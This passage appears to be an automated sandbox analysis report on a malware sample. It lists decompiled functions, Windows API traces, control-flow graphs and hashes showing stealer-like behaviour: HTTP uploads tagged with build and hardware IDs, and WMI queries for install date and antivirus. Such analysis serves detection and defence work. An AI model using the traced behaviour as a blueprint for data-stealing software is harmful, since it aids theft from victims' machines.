                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00FE17CB
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: FileHeap$_memset$CloseCreateHandleProcess$AllocateFreePathReadTempWrite_time64randsrandwsprintf
                                                                                                                                                                                                                                                          • String ID: %s%s$delays.tmp
                                                                                                                                                                                                                                                          • API String ID: 1620473967-1413376734
                                                                                                                                                                                                                                                          • Opcode ID: a6b3180b04d8f29eeb3185bf12dd6f92953d3f492677f36a9012c68319fe5053
                                                                                                                                                                                                                                                          • Instruction ID: d6f4f3b14e918c7a5c3aaa70b96bf6f97970de4b81660ead8b8b4720717bfb96
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a6b3180b04d8f29eeb3185bf12dd6f92953d3f492677f36a9012c68319fe5053
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6E4162B1900219ABEB319B729C4CE9B7BBDFF89B21F0045A9B14AD1041DB7A4D54DF60
                                                                                                                                                                                                                                                          Function 00FE4B20 Relevance: 33.6, APIs: 12, Strings: 7, Instructions: 378networkstringfileCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 1202 fe4b20-fe4be5 call ff073c call fe4aa7 call ff070a * 5 InternetOpenA StrCmpCA 1217 fe4bed-fe4bf3 1202->1217 1218 fe4be7 1202->1218 1219 fe4bf9-fe4d83 call ff1e6d call ff07ea call ff07b0 call fe2910 * 2 call ff082c call ff07b0 call fe2910 call ff082c call ff07b0 call fe2910 call ff07ea call ff07b0 call fe2910 call ff082c call ff07b0 call fe2910 call ff082c call ff07b0 call fe2910 call ff082c call ff07ea call ff07b0 call fe2910 * 2 InternetConnectA 1217->1219 1220 fe5186-fe5228 InternetCloseHandle call fe2910 * 8 call ffcab4 1217->1220 1218->1217 1219->1220 1289 fe4d89-fe4dc3 HttpOpenRequestA 1219->1289 1290 fe517a-fe5180 InternetCloseHandle 1289->1290 1291 fe4dc9-fe4dcf 1289->1291 1290->1220 1292 fe4ded-fe510c call ff082c call ff07b0 call fe2910 call ff07ea call ff07b0 call fe2910 call ff082c call ff07b0 call fe2910 call ff082c call ff07b0 call fe2910 call ff082c call ff07b0 call fe2910 call ff082c call ff07b0 call fe2910 call ff07ea call ff07b0 call fe2910 call ff082c call ff07b0 call fe2910 call ff082c call ff07b0 call fe2910 call ff07ea call ff07b0 call fe2910 call ff082c call ff07b0 call fe2910 call ff082c call ff07b0 call fe2910 call ff082c call ff07b0 call fe2910 call ff082c call ff07b0 call fe2910 call ff07ea call ff07b0 call fe2910 call ff070a call ff07ea * 2 call ff07b0 call fe2910 * 2 lstrlenA * 2 HttpSendRequestA 1291->1292 1293 fe4dd1-fe4de7 InternetSetOptionA 1291->1293 1396 fe514e-fe5166 InternetReadFile 1292->1396 1293->1292 1397 fe510e-fe5116 1396->1397 1398 fe5168-fe5175 InternetCloseHandle call fe2910 1396->1398 1397->1398 1399 fe5118-fe5149 call ff082c call ff07b0 call fe2910 1397->1399 1398->1290 1399->1396
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 00FF073C: lstrcpyA.KERNEL32(00000000,?,?,00FE1CF7,?,00FF7504), ref: 00FF075B
                                                                                                                                                                                                                                                            • Part of subcall function 00FE4AA7: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00FE4AD9
                                                                                                                                                                                                                                                            • Part of subcall function 00FE4AA7: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00FE4ADF
                                                                                                                                                                                                                                                            • Part of subcall function 00FE4AA7: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00FE4AE5
                                                                                                                                                                                                                                                            • Part of subcall function 00FE4AA7: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00FE4AF7
                                                                                                                                                                                                                                                            • Part of subcall function 00FE4AA7: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00FE4AFF
                                                                                                                                                                                                                                                            • Part of subcall function 00FF070A: lstrcpyA.KERNEL32(00000000,00000000,?,00FF724D,0101572D,?,?,?,?,00FF8011), ref: 00FF0730
                                                                                                                                                                                                                                                          • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00FE4BBF
                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?), ref: 00FE4BDD
                                                                                                                                                                                                                                                          • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00FE4D75
                                                                                                                                                                                                                                                          • HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 00FE4DB9
                                                                                                                                                                                                                                                          • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00FE4DE7
                                                                                                                                                                                                                                                            • Part of subcall function 00FF082C: lstrlenA.KERNEL32(?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0840
                                                                                                                                                                                                                                                            • Part of subcall function 00FF082C: lstrcpyA.KERNEL32(00000000,?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0868
                                                                                                                                                                                                                                                            • Part of subcall function 00FF082C: lstrcatA.KERNEL32(?,00000000,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0873
                                                                                                                                                                                                                                                            • Part of subcall function 00FF07B0: lstrcpyA.KERNEL32(00000000,?,?,00FF7286,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF07E0
                                                                                                                                                                                                                                                            • Part of subcall function 00FF07EA: lstrcpyA.KERNEL32(00000000,?,0000000C,00FF74CC,010157A7), ref: 00FF0818
                                                                                                                                                                                                                                                            • Part of subcall function 00FF07EA: lstrcatA.KERNEL32(?,?), ref: 00FF0822
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?,010159AB,",build_id,01016814,------,01016808,",hwid,010167F4,------), ref: 00FE50E0
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?,?,00000000), ref: 00FE50F3
                                                                                                                                                                                                                                                          • HttpSendRequestA.WININET(00000000,?,00000000), ref: 00FE5101
                                                                                                                                                                                                                                                          • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00FE515E
                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 00FE5169
                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(?), ref: 00FE5180
                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(?), ref: 00FE518C
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileOptionReadSend
                                                                                                                                                                                                                                                          • String ID: "$"$------$------$------$build_id$hwid
                                                                                                                                                                                                                                                          • API String ID: 3006978581-3960666492
                                                                                                                                                                                                                                                          • Opcode ID: 6c2626e800eeaf311f9eaf054aabb43aba5c6480364eadd02f943b2390c601d0
                                                                                                                                                                                                                                                          • Instruction ID: 25e5f2bf55560cac4ff10b762bffcbc581090c7807af54f5f82b1d0e2c738b00
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6c2626e800eeaf311f9eaf054aabb43aba5c6480364eadd02f943b2390c601d0
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2B02A332D1516E9ACB60AB21DC42AEDB7B5FF04340F4140E1A64877126DEB97F86AFC0
                                                                                                                                                                                                                                                          Function 00FF1A2A Relevance: 33.4, APIs: 11, Strings: 8, Instructions: 143memorycomtimeCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 00FF1A31
                                                                                                                                                                                                                                                          • CoInitializeEx.OLE32(00000000,00000000,0000004C,00FF40D6,Install Date: ,01015898,00000000,Windows: ,01015888,Work Dir: In memory,01015870), ref: 00FF1A42
                                                                                                                                                                                                                                                          • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00FF1A53
                                                                                                                                                                                                                                                          • CoCreateInstance.OLE32(01011F18,00000000,00000001,01011E48,?), ref: 00FF1A6D
                                                                                                                                                                                                                                                          • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00FF1AA3
                                                                                                                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 00FF1AFE
                                                                                                                                                                                                                                                            • Part of subcall function 00FF197A: __EH_prolog3_catch.LIBCMT ref: 00FF1981
                                                                                                                                                                                                                                                            • Part of subcall function 00FF197A: CoCreateInstance.OLE32(010121C8,00000000,00000001,0101A004,?,00000018,00FF1B24,?), ref: 00FF19A4
                                                                                                                                                                                                                                                            • Part of subcall function 00FF197A: SysAllocString.OLEAUT32(?), ref: 00FF19B1
                                                                                                                                                                                                                                                            • Part of subcall function 00FF197A: _wtoi64.MSVCRT ref: 00FF19E4
                                                                                                                                                                                                                                                            • Part of subcall function 00FF197A: SysFreeString.OLEAUT32(?), ref: 00FF19FD
                                                                                                                                                                                                                                                            • Part of subcall function 00FF197A: SysFreeString.OLEAUT32(00000000), ref: 00FF1A04
                                                                                                                                                                                                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 00FF1B2D
                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00FF1B39
                                                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 00FF1B40
                                                                                                                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 00FF1B7F
                                                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 00FF1B6C
                                                                                                                                                                                                                                                            • Part of subcall function 00FF070A: lstrcpyA.KERNEL32(00000000,00000000,?,00FF724D,0101572D,?,?,?,?,00FF8011), ref: 00FF0730
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: String$AllocCreateFreeHeapInitializeInstanceTimeVariant$BlanketClearFileH_prolog3_catchH_prolog3_catch_InitProcessProxySecuritySystem_wtoi64lstrcpywsprintf
                                                                                                                                                                                                                                                          • String ID: %d/%d/%d %d:%d:%d$InstallDate$ROOT\CIMV2$Select * From Win32_OperatingSystem$Unknown$Unknown$Unknown$WQL
                                                                                                                                                                                                                                                          • API String ID: 2280294774-461178377
                                                                                                                                                                                                                                                          • Opcode ID: 0aeadb973464901c3081f4cca288d8fddde5b281ec562d78255664ca3ed08271
                                                                                                                                                                                                                                                          • Instruction ID: cbe9bceba38a52eca3c1454fe7994a9ebbfe9f5e862732b2c1d1a73afc6077b5
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0aeadb973464901c3081f4cca288d8fddde5b281ec562d78255664ca3ed08271
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 14414972940209FBCB219BD6DC48EEFBBBDFFCAB11F104109F641AA194D6799941DB20
                                                                                                                                                                                                                                                          Function 00FE5229 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 161networkmemoryfileCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 1430 fe5229-fe52bb call ff073c call fe4aa7 GetProcessHeap RtlAllocateHeap InternetOpenA StrCmpCA 1435 fe52bf-fe52c5 1430->1435 1436 fe52bd 1430->1436 1437 fe543d-fe545f InternetCloseHandle call fe2910 * 2 1435->1437 1438 fe52cb-fe52f1 InternetConnectA 1435->1438 1436->1435 1452 fe5465-fe5473 call ffcab4 1437->1452 1439 fe52f7-fe5332 HttpOpenRequestA 1438->1439 1440 fe5431-fe5437 InternetCloseHandle 1438->1440 1442 fe5338-fe533a 1439->1442 1443 fe5425-fe542b InternetCloseHandle 1439->1443 1440->1437 1445 fe533c-fe5352 InternetSetOptionA 1442->1445 1446 fe5358-fe538e HttpSendRequestA HttpQueryInfoA 1442->1446 1443->1440 1445->1446 1448 fe53ad-fe53af 1446->1448 1449 fe5390-fe53a8 call fe2910 * 2 1446->1449 1448->1443 1453 fe53b1 1448->1453 1449->1452 1456 fe541d-fe5423 1453->1456 1456->1443 1459 fe53b3-fe53da InternetReadFile 1456->1459 1459->1443 1461 fe53dc-fe541b 1459->1461 1461->1456 1461->1461
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 00FF073C: lstrcpyA.KERNEL32(00000000,?,?,00FE1CF7,?,00FF7504), ref: 00FF075B
                                                                                                                                                                                                                                                            • Part of subcall function 00FE4AA7: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00FE4AD9
                                                                                                                                                                                                                                                            • Part of subcall function 00FE4AA7: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00FE4ADF
                                                                                                                                                                                                                                                            • Part of subcall function 00FE4AA7: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00FE4AE5
                                                                                                                                                                                                                                                            • Part of subcall function 00FE4AA7: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00FE4AF7
                                                                                                                                                                                                                                                            • Part of subcall function 00FE4AA7: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00FE4AFF
                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00FE5270
                                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 00FE5277
                                                                                                                                                                                                                                                          • InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 00FE5299
                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?), ref: 00FE52B3
                                                                                                                                                                                                                                                          • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00FE52E3
                                                                                                                                                                                                                                                          • HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00FE5322
                                                                                                                                                                                                                                                          • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00FE5352
                                                                                                                                                                                                                                                          • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00FE535D
                                                                                                                                                                                                                                                          • HttpQueryInfoA.WININET(?,00000013,?,?,00000000), ref: 00FE5386
                                                                                                                                                                                                                                                          • InternetReadFile.WININET(?,?,00000400,?), ref: 00FE53CC
                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(?), ref: 00FE542B
                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(?), ref: 00FE5437
                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(?), ref: 00FE5443
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Internet$CloseHandleHttp$HeapOpenRequest$AllocateConnectCrackFileInfoOptionProcessQueryReadSendlstrcpylstrlen
                                                                                                                                                                                                                                                          • String ID: GET
                                                                                                                                                                                                                                                          • API String ID: 442264750-1805413626
                                                                                                                                                                                                                                                          • Opcode ID: abed33d5800e583a6319bc33beb4f94e0e79b08524d00d11fac794444e405a4c
                                                                                                                                                                                                                                                          • Instruction ID: 6722bf070255fe5219feae7fe5008f5b4cf174a0a0c9f4340497ca90962d406d
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: abed33d5800e583a6319bc33beb4f94e0e79b08524d00d11fac794444e405a4c
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8251197290096CAFDB209F65EC84BEFBBB9EB08756F4040A5FA09A2140D7755F809F90
                                                                                                                                                                                                                                                          Function 00FF1BBA Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 114comCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 1508 ff1bba-ff1c1e call 100eb3d CoInitializeEx CoInitializeSecurity CoCreateInstance 1512 ff1c24-ff1c50 CoSetProxyBlanket 1508->1512 1513 ff1cc3-ff1cc8 1508->1513 1515 ff1c54-ff1c56 1512->1515 1514 ff1cdc call ff070a 1513->1514 1519 ff1ce1-ff1ce8 call 100ebe2 1514->1519 1517 ff1cbc-ff1cc1 1515->1517 1518 ff1c58-ff1c63 1515->1518 1517->1514 1520 ff1cb6-ff1cd7 1518->1520 1521 ff1c65-ff1c7a 1518->1521 1520->1514 1521->1520 1526 ff1c7c-ff1cb4 VariantInit call ff1f65 call ff070a VariantClear 1521->1526 1526->1519
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • __EH_prolog3_catch.LIBCMT ref: 00FF1BC1
                                                                                                                                                                                                                                                          • CoInitializeEx.OLE32(00000000,00000000,00000030,00FF4144,?,AV: ,010158AC,Install Date: ,01015898,00000000,Windows: ,01015888,Work Dir: In memory,01015870), ref: 00FF1BD0
